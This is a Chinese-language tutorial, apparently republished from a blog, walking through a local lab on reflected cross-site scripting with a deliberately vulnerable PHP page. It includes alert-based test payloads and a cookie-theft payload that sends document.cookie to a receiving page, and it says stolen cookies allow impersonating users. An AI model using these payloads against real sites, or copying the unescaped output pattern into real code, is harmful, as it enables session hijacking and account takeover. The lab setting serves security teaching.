2. 程式人生 > 其它 >web安全之xss跨站指令碼攻擊

web安全之xss跨站指令碼攻擊

阿新 發佈:2021-08-01
實驗(一) 一、預備知識 1、HTML基礎知識 2、phpstudy運用 3、xss的分類 二、實驗環境 1、火狐瀏覽器、Chrome瀏覽器 2、phpstudy 三、環境搭建 反射型xss環境搭建 1、原始碼: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>反射型XSS測試</title> </head> <form action="" method="get"> <input type="text" name="msg"/>
<input type="submit" value="submit"/> </form> <?php if(isset($_GET['msg']) && $_GET['msg'] != '') { echo '您輸入的內容為:' . $_GET['msg']; } 2、將檔案型別儲存為.php並放入phpstudy中---具體操作點選連結 https://blog.csdn.net/qq_21237549/article/details/106045287 四、實驗步驟 正常情況下,使用者只會輸入一些普通字元,也就是數字、字母或者中文,所以,不會有什麼安全問題。
1、首先開啟本次實驗的頁面,localhost/1.php,隨便輸入一些普通字元測試,我輸入的內容為“中國奧運加油”。 然後點選submit,提交資料,會直接輸出我們輸入的內容,注意這裡使用的是GET方法傳參 2、我們輸入<script>alert(1)</script>測試,測試XSS最常用的就是<script>alert(1)</script>,如果頁面存在XSS,那麼就會彈出“1”這個字元。 3、 點選確定,發現您輸入的內容後面沒有任何顯示,在頁面滑鼠右擊,選擇檢視頁面原始碼,可以看到我們輸入的內容確實輸出了。 但沒有顯示出來,why???
因為我們輸入的資料被當成了程式碼來執行,如何確定我們輸入的資料是否被瀏覽器當成程式碼解析了呢? 一檢視我們輸入的標籤的字型的顏色,如果是深紫色,則代表它被當成了程式碼來解析。 像這種獲取了使用者的輸入後,直接就在頁面輸出,沒有經過資料庫的XSS,就稱為反射型XSS,他只是簡單地把使用者輸入的資料“反射”了。所以,要觸發這種XSS,使用者必須訪問特定的連結。而且程式碼會直接顯示在瀏覽器位址列,很明顯,所以反射型XSS比較容易發現,而且現在的瀏覽器一般都帶有XSS過濾器。比如Chrome。 4、我們可以輸入其他的JS程式碼,來讓瀏覽器做其他的事,比如彈出使用者cookie,在輸入框中輸入<script>alert(document.cookie)</script>,其中document.cookie可以用來獲取使用者的cookie。提交後發現彈出視窗中內容為空白 5、修改該頁面原始碼,當訪問頁面的時候,設定一下cookie,並啟用session 6、在訪問該頁面的時候,就會設定一個cookie,名稱為username,值為xssuser,還會產生一個session。session同樣用來識別使用者身份,只是session是服務端維護,不是儲存在客戶端,我們不需要知道session的值具體含義。儲存後再次訪問該頁面,重複上面的步驟,就會彈出新設定的cookie。 上面的語句只能彈出使用者的cookie,我們如何通過XSS得到使用者的cookie呢?畢竟如果只是彈出的話,只有訪問該頁面的人才能看到,而我們是看不到的。 我們可以通過JS,構造一個請求,來請求一個我們有許可權的頁面,在構造請求的時候,把使用者的cookie當作引數傳過去,然後我們就可以在這個頁面裡,接收傳過來的引數,然後再儲存起來。所以首先需要寫一個接收cookie的頁面,它能夠接收某個引數,然後儲存起來。頁面寫好儲存在c:\wamp\www\xss\的目錄 25.php這個檔案就是用來接收cookie並儲存的,原始碼如下: 7、輸入語句<script>new Image().src="http://localhost/1.php/25.php?msg="+encodeURI(document.cookie);</script> 然後點選submit,然後進入C:\wamp\www\xss目錄,開啟cookies.txt,就可以看到當前訪問http://xss.com/xss-ref.php這個頁面的人的cookie。 這樣就拿到了使用者的cookie,拿到cookie後,我們就可以替換cookie來冒充其他人的身份,來做一些惡意操作。

相關推薦

web安全xss指令碼攻擊

實驗(一) 一、預備知識 1、HTML基礎知識 2、phpstudy運用 3、xss的分類 二、實驗環境

DVWA—XSS 指令碼攻擊

XSS概念:通常指黑客通過HTML注入纂改了網頁,插入惡意指令碼,從而在使用者瀏覽網頁時,控制使用者瀏覽器的一種攻擊

XSS指令碼攻擊

XSS的原理和分類 跨站指令碼攻擊XSS(Cross Site Scripting),為了不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故將跨站指令碼攻擊縮寫為XSS。惡意攻擊者往Web頁面裡插入惡意Script程式碼,當用戶瀏覽該

XSS指令碼攻擊剖析與防禦》

xss-lab體會 探測xss漏洞 先輸入測試唯一的字元,確認輸入、輸出點 可能的輸入點

XSS指令碼攻擊型別、分類

XSS 介紹 XSS指令碼攻擊(Cross Site Scripting)的簡寫,但是從首寫字母命名的方式來看,應該取名css,但這樣就和層疊樣式表(Cascading Style Sheets,css)重名了,所以取名為 XSS

XSS指令碼攻擊(Cross site script)解析及靶場復現

1. 概述 指令碼攻擊(Cross site script),為區分CSS層疊樣式表,故稱為XSSXSS屬於客戶端攻擊,通常指攻擊者在網頁中嵌入Javascritp編寫的惡意程式碼指令碼,當用戶使用瀏覽器瀏覽被嵌入惡意程式碼的網站時,

XSS 指令碼攻擊 漏洞

0x00 XSS 前置知識 什麼是 BOM 瀏覽器物件模型(Browser Object Model (BOM)) 由於現代瀏覽器已經(幾乎)實現了 JavaScript 互動性方面的相同方法和屬性,因此常被認為是 BOM 的方法和屬性。

聊兩句XSS指令碼攻擊

XSS指令碼攻擊),聊兩句,五毛的。 XSS的危害: 竊取Cookie,盜用使用者身份資訊

指令碼攻擊xss

  XSS全稱(Cross Site Scripting)跨站指令碼攻擊,是最常見的Web應用程式安全漏洞之一,位於OWASP top 10 2013/2017年度分別為第三名和第七名,XSS是指攻擊者在網頁中嵌入客戶端指令碼,通常是JavaScript編寫的

【必須】新增安全響應頭 指令碼注入攻擊

https://github.com/Tencent/secguide/blob/main/Go安全指南.md 1.6.2 【必須】新增安全響應頭

指令碼攻擊XSS

1.  指令碼攻擊XSS https://blog.csdn.net/FE_dev/article/details/100876661?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1-100876

白帽黑客與網安工程師教你Kali:指令碼攻擊,隨便開啟一個網站就可能被黑客控制!

一、課前宣告: 1、本分享僅做學習交流,請自覺遵守法律法規! 2、搜尋:Kali 與程式設計,學習更多網路攻防乾貨! 3、Kali 與程式設計每天準時更新,敬請學習和關注! 二、背景介紹 BeEF-XSS是一款非常強大

滲透測試--xss指令碼

技術標籤:滲透測試滲透測試網路安全xss指令碼 xss指令碼 XSS簡介 XSS全稱(Cross Site Scripting)指令碼攻擊

XSS指令碼初探

技術標籤:xssxss XSS初探 什麼是XSS XSS遠稱CSS(cross site script) , 跨站指令碼攻擊。是一種經常出現在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入提供給其他使用者使用的頁面中。

重新整理 .net core 實踐篇————防指令碼攻擊[四十]

前言 簡單整理一下指令碼攻擊。 正文 攻擊原理是這樣子的: 這種攻擊攻擊的面挺多的,比如說只要有一個可以讓使用者輸入的注入指令碼就都是一個問題。

XSS指令碼

01 XSS簡介 跨站指令碼(Cross-SiteScripting,XSS)是一種經常出現在Web應用程式中的電腦保安漏洞,是由於Web應用程式對使用者的輸入過濾不足而產生的。攻擊者利用網站漏洞把惡意的指令碼程式碼(通常包括HTML程式

XSS網路攻擊

1. 什麼是跨站網路攻擊 跨站指令碼攻擊(簡稱為XSS)是指惡意攻擊者在Web頁面中插入惡意javascript程式碼(也可能包含html程式碼),當用戶瀏覽網頁時,嵌入其中Web裡面的javascript程式碼會被執行,從而達到惡意

web安全指令碼漏洞(XSS

XSS指令碼)概述以及pikachu上的實驗操作 Cross-Site Scripting 簡稱為“CSS”,為避免與前端疊成樣式表的縮寫\"CSS\"衝突,故又稱XSS

Web安全SQL注入攻擊技巧與防範(轉)

add by zhj: 作者總結了防止SQL的幾種辦法,終極辦法是資料庫(如MySQL)自身提供的預編譯功能,即先將SQL語句中的引數用?替換,發給資料庫進行預編譯,得到編譯結果後再傳入引數替換?,執行SQL。

XSS】通過對HTML響應進行編碼來防止站點指令碼攻擊

技術標籤:Web 公司將應用程式移動到Web上,以改善客戶互動,降低業務處理成本並加快結果的速度。但是這樣做也會增加漏洞-除非安全性是應用程式開發過程中不可或缺的組成部分。要了解有關在組織中建立安全文化的